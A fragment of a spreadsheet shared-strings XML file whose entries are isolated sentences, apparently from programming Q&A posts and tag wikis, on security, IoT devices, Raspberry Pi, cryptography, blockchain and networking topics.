    <t>It defines a clinical document as having the following six characteristics: 1) Persistence, 2) Stewardship, 3) Potential for authentication, 4) Context, 5) Wholeness and 6) Human readability.</t>
  </si>
  <si>
    <t>It maps a human-recognizable identifier to a system-internal, often numeric, identification or addressing component.</t>
  </si>
  <si>
    <t>Jeta is a Java based Horde module to provide SSH login access to a web server, or to another machine if used in conjunction with some relaying software which can be installed on the web server.</t>
  </si>
  <si>
    <t>Such a token is often issued and signed by an entity that is able to authenticate the user by other means, and that is trusted by the entity doing the claims based authentication.</t>
  </si>
  <si>
    <t>JSON Web Token (JWT) is an open standard that defines a compact and self-contained way for securely transmitting information between parties as a JSON object.</t>
  </si>
  <si>
    <t xml:space="preserve"> is a java implementation of the bitcoin protocol, which allows it to maintain a wallet and send/receive transactions without needing a local copy of Bitcoin Core.</t>
  </si>
  <si>
    <t>In addition, you can track statistics such as number of emails sent or processed, opens, bounces and spam complaints.</t>
  </si>
  <si>
    <t>The area might have electromagnetic disturbances due to presence of AC motors
I suppose that Ethernet CAT5 cable (shielded) is a good choice.</t>
  </si>
  <si>
    <t>This causes conntrack/NAT to treat packets outside the TCP window as part of the flow being tracked, instead of marking them invalid and causing them to be handled by the host.</t>
  </si>
  <si>
    <t>It looks like this is one of these instances where the author of a crypto library is even more clueless than authors of "online tools" that perform such feat:
Now it isn't specified which padding is used, nor how it is removed.</t>
  </si>
  <si>
    <t>Segmentation faults are typically the result of a dereference operation with pointer variables (most often containing an invalid address) or a buffer overflow.</t>
  </si>
  <si>
    <t>Transactions are used to ensure data integrity and to handle database errors, by collecting SQL queries into a group and executing all of them together, as one unit of work.</t>
  </si>
  <si>
    <t>Programmers are expected to ensure that the identifiers of entities are unique in a given scope and not open to multiple interpretations.</t>
  </si>
  <si>
    <t>Reverting the effect of a binary packing: recovering its original structure and code by removing compression, encryption, protections features.</t>
  </si>
  <si>
    <t>A hostname is a label that is assigned to a device connected to a computer network and that is used to identify the device in various forms of electronic communication such as the World Wide Web, e-mail or Usenet.</t>
  </si>
  <si>
    <t>No agreement between parties is ever held, because a copyright license is simply a declaration of permissions on something that otherwise would be disallowed by default under copyright law.</t>
  </si>
  <si>
    <t>I'd like to make a program that would hold a webpage session, that means it should be access the pages that are only accessible if they are logged in( I have the necessary username and password) and to process the information.</t>
  </si>
  <si>
    <t>The way I would solve this is to have the code that needs to access the hardware run as a separate privileged process, then have your Java application run as an unprivileged process and connect to the privileged process to have it perform certain actions on its behalf.</t>
  </si>
  <si>
    <t>The term keyboard hook covers a range of techniques used to alter or augment the behavior or intercepting keyboard event messages before they reach an application.</t>
  </si>
  <si>
    <t>Darknet is an overlay network to the internet that can only be accessed by specialized software, configurations and special authorizations, and often makes use of non-standard communication protocols in order for it to be deliberately inaccessible by the internet.</t>
  </si>
  <si>
    <t>It is available at http://hackage.haskell.org/package/haskelldb
HaskellDB was originally written by Daan Leijen and it's design is described in the paper Domain Specific Embedded Compilers, Daan Leijen and Erik Meijer.</t>
  </si>
  <si>
    <t>Its designed to be evented, uses netty for the protocol encoding and decoding part, the protocol logic is essentially a single threaded and it's isolated from front connectors part by lmax disruptor's ring buffer.</t>
  </si>
  <si>
    <t>I'm currently working on a personal project which involves:
a Raspberry Pi Model b with an RFID reader/writer module
an Oracle SQL database (11g)
Python Scripting
Here's what I'm trying to-do: 
I need the Raspberry Pi to send the UID (unique identification number) which I've read from the RFID tag and insert a row into my SQL database with the UID.</t>
  </si>
  <si>
    <t>In an RTOS kernel RTOS aware dynamic memory allocation functions are required to ensure thread safety, although some standard library implementations include thread safety stubs that you implement using the RTOS mutex calls, which is a better method since existing libaries and C++ new/delete can be more easily used.</t>
  </si>
  <si>
    <t>The key design principles of X11 are
define methods, not policies
extensibility
network transparency
window based
A X11 system consists of
a X11 Server that connects with one or more display devices (called Screens), user input devices and accepts connections from so called
X11 Clients which communicate with the X11 server to receive user input and draw graphics (into windows) through it.</t>
  </si>
  <si>
    <t>But how to handle that in a threat?</t>
  </si>
  <si>
    <t>Together with Intel HEX, it became one of two industry de facto standards.</t>
  </si>
  <si>
    <t>Is this a reasonable approach to take in terms of security?</t>
  </si>
  <si>
    <t>XBEE S1 modules use AES-CTR but they don't really respect the 802.15.4 specifications during encryption.</t>
  </si>
  <si>
    <t>That is what software debouncing typically is.</t>
  </si>
  <si>
    <t>A computer system that allows access to a restricted area.</t>
  </si>
  <si>
    <t>Alpine Linux is a security-oriented, lightweight Linux distribution based on musl libc and busybox.</t>
  </si>
  <si>
    <t>Providing discovery, registry, security, circuit breaker, fault tolerance among other things.</t>
  </si>
  <si>
    <t>Bank-level security -- 100% buyer &amp; seller protection.</t>
  </si>
  <si>
    <t>I want all of these because I do not want the information inside Rpi to be hack, i want to protect all the information and the use of this by a server.</t>
  </si>
  <si>
    <t>How does one debug an issue like this, considering ssh is the main way to communicate with this computer?</t>
  </si>
  <si>
    <t>I could get this information from /proc/cpuinfo but then it is very easy to hack the program.</t>
  </si>
  <si>
    <t>This arduino will connect with the web service, using the information
(email+key) will validate the information from a db.</t>
  </si>
  <si>
    <t>I'm developing a system that requires Websockets establishment between the client and the server.</t>
  </si>
  <si>
    <t>Modifications, derivates and redistribution
#of this software must include unmodified this COPYRIGHT NOTICE.</t>
  </si>
  <si>
    <t>sudden Server Certificate verification failure also appears to be related to an in-house git server.</t>
  </si>
  <si>
    <t>Similar to banking software or the checkout software at grocery stores.</t>
  </si>
  <si>
    <t>I can connect to the raspberry pi via a SSH key through a program called Tera Term and edit information on the raspberry pie.</t>
  </si>
  <si>
    <t>I'm working on a project with raspberry pi that has to be super secure, so I needed Kali Linux to do penetration testing.</t>
  </si>
  <si>
    <t>However, my questions : 
What different between AWSIoTMQTTClient vs AWSIoTShadowClient in terms of performance, security, maintenance?</t>
  </si>
  <si>
    <t>Tool Image Winform
I am working on a tool that connected to my Bluetooth receiver and scan and get MAC address of BLE devices.</t>
  </si>
  <si>
    <t>I want to secure my code running in Raspberry Pi3 by converting all .py source to .so source.</t>
  </si>
  <si>
    <t>Check anti-virus settings.</t>
  </si>
  <si>
    <t>Hence the pin state has to be manipulated by the software.</t>
  </si>
  <si>
    <t>That way you don't create the possibility of a memory leak later on.</t>
  </si>
  <si>
    <t>It leaks memory in ways that are not so easy to predict, and leads to mysterious lockups of the board.</t>
  </si>
  <si>
    <t>There's also the question of which Certificate Authorities you will trust and how you will communicate with them for things like certificate revocation.</t>
  </si>
  <si>
    <t>TCP itself rides on top of IP, which provides unified addressing to communicate between computers.</t>
  </si>
  <si>
    <t>Otherwise, a bug or malicious code on the server can corrupt your memory.</t>
  </si>
  <si>
    <t>Identifying the badge / face would be the "easy" part.</t>
  </si>
  <si>
    <t>Again, "no", but if you want to be bulletproof to that: do not depend on the textual output of third part software.</t>
  </si>
  <si>
    <t>For more detailed information you can reference "Custom device authentication".</t>
  </si>
  <si>
    <t>For safety, you should make certain that your recording equipment is electrically isolated.</t>
  </si>
  <si>
    <t>There are techniques like reverse engineering that can be used to reveal your algorithm.</t>
  </si>
  <si>
    <t>It probably not specifically for security reasons... it's just the way the service was designed to work.</t>
  </si>
  <si>
    <t>Kubernetes is an orchestration tool like Docker Swarm but more prominent than Docker Swarm with respect to features, scaling, resiliency, and security.</t>
  </si>
  <si>
    <t>You'll also need to provide /dev/mem, and you'll need to run with --privileged:
docker run -it --rm --privileged --device /dev/mem -v /tmp/cpuinfo:/proc/cpuinfo alpine sh
This gives us:
/ # gpio -v
gpio version: 2.26
Copyright (c) 2012-2015 Gordon Henderson
This is free software with ABSOLUTELY NO WARRANTY.</t>
  </si>
  <si>
    <t>This is the basic principle of the heartbleed cyber attackreferencing an array beyond its bounds.</t>
  </si>
  <si>
    <t xml:space="preserve">
and one item per device growing in it's inside, with an array of those JSON events classified by the key's name.</t>
  </si>
  <si>
    <t>The QKeyEvent class, part of the Qt framework, describes a key event.</t>
  </si>
  <si>
    <t>Trusted timestamping is used to prove the existence of certain data before a certain point (e.g.</t>
  </si>
  <si>
    <t>MT940 is a banking international standard used for the paperless transmission of account information.</t>
  </si>
  <si>
    <t>It is most commonly known for it's antivirus software--also called McAfee.</t>
  </si>
  <si>
    <t>SQA is an acronym that stands for Software Quality Assurance.</t>
  </si>
  <si>
    <t>The ledger itself can also be programmed to trigger transactions automatically.</t>
  </si>
  <si>
    <t>/etc/shadow is a file on UNIX systems which contains the password information for the system's accounts and optional aging information.</t>
  </si>
  <si>
    <t>iwconfig is a tool used to configure wireless network interfaces on Linux systems.</t>
  </si>
  <si>
    <t>Instamojo lets you collect payments instantly with just a link.</t>
  </si>
  <si>
    <t>Transport Layer Security (TLS) is a cryptographic protocol designed to provide communications security over a computer network.</t>
  </si>
  <si>
    <t>The trigger is mostly used for maintaining the integrity of the information on the database.</t>
  </si>
  <si>
    <t>EnCase is a proprietary forensic software suite.</t>
  </si>
  <si>
    <t>The software changes any computer into a secure workstation.</t>
  </si>
  <si>
    <t>It is used to verify and prove hardware and software.</t>
  </si>
  <si>
    <t>Also it powers Cosmos, which is a decentralized network of independent parallel blockchains.</t>
  </si>
  <si>
    <t>It is maintained by Google and enables the development of Trusted Applications that can communicate with Android applications.</t>
  </si>
  <si>
    <t>It also has some support for microprocessors with memory protection units.</t>
  </si>
  <si>
    <t>Code analysis can be classified from several perspectives, including:
1.</t>
  </si>
  <si>
    <t>The server libraries act as publishers and handle authentication.</t>
  </si>
  <si>
    <t>Certification is embedded in the Windows Store onboarding process.</t>
  </si>
  <si>
    <t>HTTP therefore acts as a wrapper for a channel that the network protocol being tunneled uses to communicate.</t>
  </si>
  <si>
    <t>Using  with --amend you also reset author and author timestamp.</t>
  </si>
  <si>
    <t>For detailed information and examples, visit the flask-login documentation.</t>
  </si>
  <si>
    <t>Key Distribution Center (KDC) is part of a cryptosystem intended to reduce the risks inherent in exchanging keys.</t>
  </si>
  <si>
    <t>Cryptocurrency is defined as a digital medium of exchange money.</t>
  </si>
  <si>
    <t>You can use Copssh for remote administration of your systems or gathering remote information in a secure way.</t>
  </si>
  <si>
    <t>We cannot but ask for a document; it is impossible to send "personal" data to servers.</t>
  </si>
  <si>
    <t>VMIDs are used by the distributed garbage collector to identify client VMs.</t>
  </si>
  <si>
    <t>Phishing is an example of social engineering techniques used to deceive users.</t>
  </si>
  <si>
    <t>Privacy
Presence is a sensitive information when it comes down user privacy.</t>
  </si>
  <si>
    <t>LoginListener: this interface provides a contract to "listen"
the current login process and act in consequence.</t>
  </si>
  <si>
    <t>Do not use it to back up the operating system or any software that requires a password to install.</t>
  </si>
  <si>
    <t>The Windows SDK includes the Windows App Certification Kit.</t>
  </si>
  <si>
    <t>If a program does not statically check, DDC will not result in valid generated code.</t>
  </si>
  <si>
    <t>To use sensitive information in your clusters, you must use Secrets.</t>
  </si>
  <si>
    <t>Transactions are managed entirely by the network in a decentralized manner.</t>
  </si>
  <si>
    <t>MSISDN is a number uniquely identifying a subscription in a GSM or a UMTS mobile network.</t>
  </si>
  <si>
    <t>Worms and Trojan horses, like viruses, may harm a computer system's data or performance.</t>
  </si>
  <si>
    <t>These types of information leaks can also hurt in ways you don't expect.</t>
  </si>
  <si>
    <t>This is why AFTER you have set up the SSH keys as described in one of the methods above, you must change the way git is referring to the remote repo from https protocol to ssh protocol.</t>
  </si>
  <si>
    <t>Less commonly, refers to packet sniffing with tools like Wireshark.</t>
  </si>
  <si>
    <t>YANG is a data modeling language originally designed to model data manipulated by the Network Configuration Protocol (NETCONF).</t>
  </si>
  <si>
    <t>For this we developed Liquid
  which allows our customers complete
  design freedom while maintaining the
  integrity of our servers.</t>
  </si>
  <si>
    <t>These algorithms are unsupervised, which means no human input is necessary  you only need a corpus of plain text documents.</t>
  </si>
  <si>
    <t>It works, but I want to make my code robust to errors, such as hardware failure, the sensor being unplugged etc.</t>
  </si>
  <si>
    <t>A GKMinmaxStrategist object is a form of artificial intelligence for use in turn-based, adversarial games.</t>
  </si>
  <si>
    <t>Lets Encrypt is a free, automated, and open certificate authority provided by the Internet Security Research Group.</t>
  </si>
  <si>
    <t>Similar to Yodlee, Plaid provides access to a user's bank account information based on credentials provided by the user.</t>
  </si>
  <si>
    <t>The Unplugged system consists of the Unplugged XPages Engine on the mobile device and the Unplugged Data Synchronizer on the IBM Domino server.</t>
  </si>
  <si>
    <t>In computer security, a sandbox is a security mechanism for separating running programs.</t>
  </si>
  <si>
    <t>Spot is an Apache incubating project for threat detection from data flow and packet analysis.</t>
  </si>
  <si>
    <t>They use the MIB, or Management Information Base, which is the schema that allows the computers to communicate and establish understanding, such as data types, permissions and other values.</t>
  </si>
  <si>
    <t>It is designed to be used to implement protocols and "smart contracts" on a general-purpose blockchain, but could be used in other settings as well.</t>
  </si>
  <si>
    <t>When a database is accessed by multiple connections, and one of the processes modifies the database, the SQLite database is locked until that transaction is committed.</t>
  </si>
  <si>
    <t>Unless code takes precautions to make sure that it keeps its data structures in a consistent state, you're asking for data corruption and crashes.</t>
  </si>
  <si>
    <t>So, a good practice will be to verify the path like this ( If you are on a linux based machine ):
You will get an error if the path is incorrect or the file is missing.</t>
  </si>
  <si>
    <t>Permissive open-source licensing, in addition to a closed-source
library option.</t>
  </si>
  <si>
    <t>Fraud-prevention is based on the premise that fraud is not a random occurrence; fraud occurs where the conditions are right for it to occur.</t>
  </si>
  <si>
    <t>Note that HTTP restful access needs proper authentication and perform SigV4 signing process when using IAM credentials, which is handled by the AWS SDKs for you.</t>
  </si>
  <si>
    <t>I have realised that it is because I have been using an unsigned apk for testing purposes, and I have now read that a time limited signature is added in the process.</t>
  </si>
  <si>
    <t>software for encryption can typically also perform decryption), to make the encrypted information readable again (i.e.</t>
  </si>
  <si>
    <t>They are also off-topic on Information Security unless they demonstrate an understanding of the concepts involved and clearly identify a specific problem.</t>
  </si>
  <si>
    <t>I can achieve this through the following code:
This program execution requires special system permissions in AndroidManifest.xml:
The code runs well and the virtual keyboard can appear when testing.</t>
  </si>
  <si>
    <t>Troubleshooting
If you are running t on a remote computer you can use the flag --display-uri during authorize process to display the url instead of opening the web browser.</t>
  </si>
  <si>
    <t>Template additions to help meet some GDPR requirements  Give users control over their personal data and handle cookie consent.</t>
  </si>
  <si>
    <t>JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object.</t>
  </si>
  <si>
    <t>Terms of Use
We need to protect users, content providers, the Spotify trade marks and our software and service while at the same time enabling you to create applications.</t>
  </si>
  <si>
    <t>One alternative to avoid polling (from the docs) is wait_for_edge():
The wait_for_edge() function is designed to block execution of your program
  until an edge is detected.</t>
  </si>
  <si>
    <t>pattern [read|write|readwrite] 
The patterns available for substition are:
%c to match the client id of the client
%u to match the username of the client
The substitution pattern must be the only text for that level of
  hierarchy.</t>
  </si>
  <si>
    <t>I also tried to install analyze-ssl.pl, but the installation of cpan App::cpanminus failed with 
Writing MYMETA.yml and MYMETA.json
  MIYAGAWA/App-cpanminus-1.7044.tar.gz
  /usr/bin/perl Makefile.PL INSTALLDIRS=site -- OK
Running make for M/MI/MIYAGAWA/App-cpanminus-1.7044.tar.gz
  MIYAGAWA/App-cpanminus-1.7044.tar.gz
  make -- NOT OK
I will try to install analyze-ssl.pl tomorrow or open another thread.</t>
  </si>
  <si>
    <t>So while your version may remain constant at 1.0-SNAPSHOT for many iterations until release, you will have a build number that can uniquely identify each build during that time.</t>
  </si>
  <si>
    <t>Core Spotlight is designed for apps that handle persistent user data, such as documents, photos, and other types of content created by or on behalf of users.</t>
  </si>
  <si>
    <t>Run "C:\Program Files\Git\bin\bash.exe" --login -i "C:\Program Files\Docker Toolbox\start.sh" aka "Docker Quickstart Terminal" shortcut
Run "C:\Program Files\Docker Toolbox\kitematic\Kitematic.exe" aka Kitematic (Alpha)
Search nodemcu-build by marcelstoer
Click Create...
After download, run.</t>
  </si>
  <si>
    <t>This project makes it much easier to access Cloud IoT core from Android Things and handles various best practices such as token refresh.</t>
  </si>
  <si>
    <t>Then, when your push server gets pinged, it sends the information-less hex hash (which is purged of any non-hex information for security) at which point your front-end client knows "Hey, I should poll the server for additional information."</t>
  </si>
  <si>
    <t>A transaction log file (also database log or binary log) is a history of actions executed by a database management system to guarantee ACID properties over crashes or hardware failures.</t>
  </si>
  <si>
    <t>Keystroke logging (often called keylogging or "keylogger") is the action of tracking (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored.</t>
  </si>
  <si>
    <t>Customers are responsible for verifying the correctness of the acceptance tests and reviewing test scores to decide which failed tests are of highest priority.</t>
  </si>
  <si>
    <t>The red zone is a fixed-length area of stack space that's safe from asynchronous modification (by signals or interrupts) even though it's outside the reserved part of the stack.</t>
  </si>
  <si>
    <t>[3] HealthShare enables healthcare
  professionals to leverage their existing systems and the vast amounts
  of untapped health information contained within them to support secure
  data exchange and messaging and connections to other HIEs.</t>
  </si>
  <si>
    <t>Ganache enables developers to quickly fire up a personal Ethereum blockchain which can be used to run tests, execute commands, and inspect state while controlling how the chain operates.</t>
  </si>
  <si>
    <t>Microsoft Azure BlockChain Workbench is a deployable cloud-based software application which aims to encapsulate private block chain and smart contract development through a common set of API's</t>
  </si>
  <si>
    <t>So, let's point out that again - the main idea of static analysis is not to find one hidden bug on the day before the release, but to fix dozens of bugs day by day.</t>
  </si>
  <si>
    <t>The AWS SDK typically handles this authentication for you.</t>
  </si>
  <si>
    <t>SBV is a SMT Based Verification in Haskell.</t>
  </si>
  <si>
    <t>If it doesn't have to be real good, you could xor the password by some value, and use that as the password in the source.</t>
  </si>
  <si>
    <t>As @DominicBetts said, you can refer to the referenced document to generate the SAS token by yourself.</t>
  </si>
  <si>
    <t>The AppEUI is stored in the end-device before the activation procedure is executed
The AppEUI can be different for each device or it can also be same for all device.</t>
  </si>
  <si>
    <t>Libcrypt is a copy protection mechanism developed by Sony for use in their PlayStation systems.</t>
  </si>
  <si>
    <t>It is distributed under the GNU LGPL and is used for cryptography applications and in computer algebra systems such as Mathematica and Maple.</t>
  </si>
  <si>
    <t>SpamAssassin is an open source server daemon used to examine and mark email that it identifies as spam.</t>
  </si>
  <si>
    <t>OAuth is an open standard for authorization.</t>
  </si>
  <si>
    <t>Enclaves are protected areas of execution.</t>
  </si>
  <si>
    <t>What is the better way of handling geometrical identities as data structures?</t>
  </si>
  <si>
    <t>Would WebServices be a better solution in terms of standard implementation and security ?</t>
  </si>
  <si>
    <t>This solution will involve masking, and I'm not an expert.</t>
  </si>
  <si>
    <t>Special procedures must be followed when accessing the 16-bit registers.</t>
  </si>
  <si>
    <t>This is a consequence of how MySql uses credentials based on process uid</t>
  </si>
  <si>
    <t>This approach guarantees resiliency against connectivity and device failures.</t>
  </si>
  <si>
    <t>An on-path blackbox network traffic security testing tool</t>
  </si>
  <si>
    <t>3CX is a software for Private Branch Exchange (PBX) based on the SIP (Session Initiation Protocol) standard.</t>
  </si>
  <si>
    <t>802.11 is a wireless local are network protocol standard.</t>
  </si>
  <si>
    <t>Micro Focus Fortify Software Security Center is a suite of application security analysis and management products for deployment on premise.</t>
  </si>
  <si>
    <t>Of course, all official code is carefully written and reviewed for security.</t>
  </si>
  <si>
    <t>Its primary task is to verify the dalvik bytecode of applications and optimize the bytecode for efficient execution.</t>
  </si>
  <si>
    <t>The "geek" version includes non-standard / undocumented opcodes.</t>
  </si>
  <si>
    <t>Traditionally, security systems have often been structured to specify which individuals are allowed to access each restricted resource.</t>
  </si>
  <si>
    <t>Hyperledger Fabric is the operating system of an enterprise-strength permissioned blockchain network.</t>
  </si>
  <si>
    <t>The transaction cannot be undone by, for instance, a power failure.</t>
  </si>
  <si>
    <t>I've also tried brute-forcing all permutations of the Consumer Report format, but that didn't work either.</t>
  </si>
  <si>
    <t>I cannot modify the program B, this is why I want to intercept and change the data going out by writing program A.</t>
  </si>
  <si>
    <t>I assume I am missing a key part of the installation process or the authentication.</t>
  </si>
  <si>
    <t>Here it is (removed some sensitive information (WiFi info, Twitter key, etc.)</t>
  </si>
  <si>
    <t>Am I approaching this the right way or is there some Arduino secret I dont know about that would make my life easier?</t>
  </si>
  <si>
    <t>So I have tried this:
The output of printHash that I got is 60d41271d43b875b791e2d54c34bf3f018a29763, which is exactly same with the online verification tool(link 5).</t>
  </si>
  <si>
    <t>Using Temboo and the Sparkfun esp2866 shield library I have generated the code below with all my personal information taken out.</t>
  </si>
  <si>
    <t>data,eventType,machine,eventSentUtcTime,EventProcessedUtcTime,PartitionId,EventEnqueuedUtcTime,IoTHub
Record,,,,2017-11-03T10:01:26.8295948Z,1,2017-11-03T10:01:25.7270000Z,Record
The access policy I'm using has all permissions checked.</t>
  </si>
  <si>
    <t>(source) 
(ffmpeg) ffmpeg -r 20 -i - -vcodec copy -movflags "frag_keyframe+empty_moov" -f mp4 pipe:1
What I do is that I pipe (source) into (ffmpeg) and then (ffmpeg) to my program which buffers, uploads to a server, authenticates, etc.</t>
  </si>
  <si>
    <t>But after 15 to 30 days later program crashes with error 
Illegal instruction
.</t>
  </si>
  <si>
    <t>All other systems first identify the device as "Unknown device" and after some seconds "re-identify" it as the actual keyboard.</t>
  </si>
  <si>
    <t>But I was trying to log in to the pi thru another computer like SSH and run the same python program it gives me errors like the video isn't working.</t>
  </si>
  <si>
    <t>This sector-level protection is a requirement in some of the jurisdictions in which we operate.</t>
  </si>
  <si>
    <t>Check out the guideline documentation and please read the authentication part.</t>
  </si>
  <si>
    <t>Or if it is some badly-programmed device, it may trigger a bug in the firmware, thus failing the device and making it malfunction.</t>
  </si>
  <si>
    <t>It doesn't matter if any pi's are compromised in this regard, since all your ssl certificate is doing is telling the pi's that they are, in fact, talking to the server in authority.</t>
  </si>
  <si>
    <t>As a hack, you can use a small proxy program (should be cross-platform):
Compile the program.</t>
  </si>
  <si>
    <t>You can further disable other services and application processes like login process if you want the application to be accessed by everyone.</t>
  </si>
  <si>
    <t>This is to prevent things like ads gathering too much information about your habits by targetting unique device ID's.</t>
  </si>
  <si>
    <t>It's going to very, very easy to use this class in a way that leaks or corrupts memory.</t>
  </si>
  <si>
    <t>Before starting to understand why there is this leak, I'd try to figure out if this is really a leak.</t>
  </si>
  <si>
    <t>You could get the MAC address of your nework card, which should Uniquely identify it every single time.</t>
  </si>
  <si>
    <t>All the pins have internal protection diodes connected to ground and the 5V rail.</t>
  </si>
  <si>
    <t>Any vulnerabilities would require:
That someone is able to compromise either SSH or HTTP on the Raspberry Pi
That there is something that they can do with that information.</t>
  </si>
  <si>
    <t>Exclude directories (or filetypes) from searching / testing in your antivirus tool</t>
  </si>
  <si>
    <t>And please refer to Connect your device to your IoT hub using Java,in this guide,tutorial shows you how to creates a device identity and associated security key to connect your device app.</t>
  </si>
  <si>
    <t>If you're concerned about security, then ESP8266 family modules (such as the ESP-01, ESP-WROOM-02, D1, NodeMCU) are likely not a practical choice.</t>
  </si>
  <si>
    <t>So for every device there will be a separate document with its own information (unique or having your raspberry pi serial no) .</t>
  </si>
  <si>
    <t>I opted for independent Google login as I found it easier for my mobile application.</t>
  </si>
  <si>
    <t>Looks like minetest is a game server, so unless you combine its server with other far more sensitive tasks, it's not like there's any dire consequence to unauthorized access.</t>
  </si>
  <si>
    <t>After looking here https://gstreamer-bugs.narkive.com/qAz9lMNM/bug-786304-new-srtpenc-srtpdec-don-t-work, I managed to get it working by adding , srtcp-auth and roc to caps:</t>
  </si>
  <si>
    <t>All the thing I need to do is disable or exit the anti-virus SW and everything work well again.</t>
  </si>
  <si>
    <t>Spyware is software that is installed without user permission and sends personal data to an unauthorized server without user awareness.</t>
  </si>
  <si>
    <t>Trust is a measure of how much an entity relies on other entities for its security.</t>
  </si>
  <si>
    <t>MinHash is a probabilistic hashing technique for quickly estimating how similar two sets are.</t>
  </si>
  <si>
    <t>Topics on Android malwares attack, detection and defence, permission model, application isolation, etc.</t>
  </si>
  <si>
    <t>A packet is one unit of binary data capable of being routed through a computer network.</t>
  </si>
  <si>
    <t>Includes a built-in Certificate Authority and auto-synchronizes with AD/LDAP directory systems.</t>
  </si>
  <si>
    <t>the process of manually entering data into a system by a human operator.</t>
  </si>
  <si>
    <t>FreeCap -- is a program for transparency redirect connections from programs through SOCKS server.</t>
  </si>
  <si>
    <t>A git command line tool that verifies the connectivity and validity of the objects in the database</t>
  </si>
  <si>
    <t>You can use keys to retrieve entities quickly, and you can construct keys from known values (such as account IDs).</t>
  </si>
  <si>
    <t>Cryptographic Token Information Format Standard</t>
  </si>
  <si>
    <t>Efficiently proxies and maintains connections and transport between multiple Minecraft servers.</t>
  </si>
  <si>
    <t>Digitization is the process of converting information into a digital format.</t>
  </si>
  <si>
    <t>It operates atop the Unified Payments Interface, developed by the National Payments Corporation of India.</t>
  </si>
  <si>
    <t>Often, SSL is used as a blanket term and refers to both the SSL protocol and the Transport Layer Security (TLS) protocol.</t>
  </si>
  <si>
    <t>Oracle Database Vault
Tool provided by Oracle to protect sensitive data and prevent unauthorited chnages to the database.</t>
  </si>
  <si>
    <t>Impersonation is a process whereby an application assumes another identity or security context during execution.</t>
  </si>
  <si>
    <t>More information and related tools can be obtained from https://launchpad.net/ecryptfs</t>
  </si>
  <si>
    <t>It was designed to protect servers and users from known and unknown flaws in PHP applications and the PHP core.</t>
  </si>
  <si>
    <t>The process of adding geographical identification metadata to various media.</t>
  </si>
  <si>
    <t>WebFinger is a protocol to obtain information about people by just their e-mail address.</t>
  </si>
  <si>
    <t>In an HTML or XML document, the document is invalid unless all the id attributes are unique within that document but tolerant parsers will still parse it.</t>
  </si>
  <si>
    <t>Brakeman is an open source static-analysis security vulnerability scanner for ruby-on-rails applications.</t>
  </si>
  <si>
    <t>A program or function that performs lexical analysis is called a lexical analyzer, lexer, tokenizer, or scanner.</t>
  </si>
  <si>
    <t>The name NOD32 is related to an antivirus software package available for Windows and Linux.</t>
  </si>
  <si>
    <t>The Java Authorization Contract for Containers (JACC) is a specification that is introduced in Java 2 Platform, Enterprise Edition (j2ee) version 1.4 through the Java Specifications Request (jsr) 115 process.</t>
  </si>
  <si>
    <t>Net-SNMP: Monitoring protocol that collects systems status information.</t>
  </si>
  <si>
    <t>Thrown by the persistence provider when an entity reference obtained
by EntityManager.getReference is accessed but the entity does not
exist.</t>
  </si>
  <si>
    <t>Certutil.exe is a command-line program that is installed as part of Certificate Services.</t>
  </si>
  <si>
    <t>Input devices are hardware devices used to gather information from the outside world.</t>
  </si>
  <si>
    <t>During export, you can choose the JavaScript Obfuscation option, causing the JavaScript code in your extension to be processed by the Google JavaScript Obfuscator.</t>
  </si>
  <si>
    <t>A program or function that performs lexical analysis is called a lexical analyzer, lexer, tokenizer.</t>
  </si>
  <si>
    <t>BLENC is a PHP source script protector that: 
Encodes your source code with the blowfish algorithm.</t>
  </si>
  <si>
    <t>Note that WM_CONCAT is undocumented and unsupported by Oracle, meaning it should not be used in production systems.</t>
  </si>
  <si>
    <t>CAL positions the missed call verification processes.</t>
  </si>
  <si>
    <t>Software downloaded with Composer may have bugs, just like any other, including security vulnerabilities.</t>
  </si>
  <si>
    <t>A user can begin as an anonymous user, and become an identified user without losing their information.</t>
  </si>
  <si>
    <t>Firmware is held in non-volatile memory devices such as rom, eeprom, or flash-memory.</t>
  </si>
  <si>
    <t>Banner could include third party tools license information.</t>
  </si>
  <si>
    <t>No special hardware is required, all you need is a local area network.</t>
  </si>
  <si>
    <t>Plus codes are not case-sensitive, and can therefore be easily exchanged over the phone.</t>
  </si>
  <si>
    <t>This most often refers to the physical modification of code where certain correctness conditions are upheld.</t>
  </si>
  <si>
    <t>Telegram Open Network (TON) is a blockchain platform of Telegram instant messaging system from the team of Pavel Durov.</t>
  </si>
  <si>
    <t>Unlike a distributed filesystem, Unison is a user-level program: there is no need to modify the kernel or to have superuser privileges on either host.</t>
  </si>
  <si>
    <t>Provide log entries and traces as long as they do not reveal sensitive information.</t>
  </si>
  <si>
    <t>While the former authentication mechanism contained information about where the code originated from and who signed that code, JAAS adds a marker about who runs the code.</t>
  </si>
  <si>
    <t>Two plug-ins, Jessie and Wp, are available in the platform for the verification of functional properties.</t>
  </si>
  <si>
    <t>Generally assigned a surogate key to ensure
every row can be identified.</t>
  </si>
  <si>
    <t>(e.g., text-recognition in an ocr)
Identify/Annotate a part of data set.</t>
  </si>
  <si>
    <t>The Internet-connected mobile device can thus act as a portable wireless access point and router for devices connected to it.</t>
  </si>
  <si>
    <t>I have always been active with the moderation tools available and am a stickler for voting fraud and plagiarism.</t>
  </si>
  <si>
    <t>Solid: tools and conventions for decentralized social applications proposed by Tim Berners-Lee and MIT.</t>
  </si>
  <si>
    <t xml:space="preserve"> contains certificates from other parties that you expect to communicate with, or from Certificate Authorities that you trust to identify other parties.</t>
  </si>
  <si>
    <t>IntelliLock opts a 100% managed way to apply licensing and protection features.</t>
  </si>
  <si>
    <t>The CommitFailureHandler allows automatic recovery from
connection failures whilst committing a transaction.</t>
  </si>
  <si>
    <t>ONVIF describes itself as the market's leading standardization initiative for IP-based physical security products.</t>
  </si>
  <si>
    <t>I am a Mac user and I want to automate the process of entering the password to ssh into Raspberry pi, run a few commands and transfer files to my local computer.</t>
  </si>
  <si>
    <t>have different solutions to allow in-circuit programming and a little bit of protection from bricking the part, but it is not always foolproof.</t>
  </si>
  <si>
    <t>If devices are spread over larger area (like temp-sensors in each room), then Wi-Fi based protocol is better.</t>
  </si>
  <si>
    <t>The C++ detection idiom a programming pattern for detecting valid usages of types.</t>
  </si>
  <si>
    <t>It offers complete source code protection for your server-side javascript code and combines all the related files into one.</t>
  </si>
  <si>
    <t>Warning: PyCrypto seems not maintained anymore
It seems that the PyCrypto project has not been maintained since 2014.</t>
  </si>
  <si>
    <t>By opening the pin more than once, you are encountering that the pin is already open, and I believe this is what throws an exception and crashes the app.</t>
  </si>
  <si>
